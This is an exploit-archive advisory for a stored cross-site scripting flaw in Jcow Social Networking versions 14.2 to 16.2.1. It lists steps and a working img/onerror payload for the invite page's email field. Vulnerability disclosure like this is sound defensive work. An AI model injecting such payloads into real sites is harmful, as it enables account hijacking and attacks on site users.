Jcow Social Network Cross Site Scripting

Jcow Social Network Cross Site Scripting
Posted May 24, 2024
Authored by tmrswrr

Jcow Social Networking versions 14.2 up to 16.2.1 suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 8ff452224b5c44a006c708f69ef20ee895de407da9b77ccc1fefea5c2352b824
Download | Favorite | View
# Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS 
# Date: 2024-05-23
# Author: tmrswrr
# Vendor Homepage: https://www.jcow.net/
# Software Link: https://sourceforge.net/projects/jcow/
# Tested : https://demo.jcow.net/
# Version : 14.2 < 16.2.1
1) Login with any user Click invite place : https://127.0.0.1/Jcow/index.php?p=invite
2) Write in To (Email address) field your payload : "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After Send invitations you will be see alert button

نوشته های مشابه

Improper access permission settings in multiple SEIKO EPSON printer drivers for Windows OS

Multiple vulnerabilities in Quick Agent

Security Update for Trend Micro Trend Vision One (April 2025)

i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key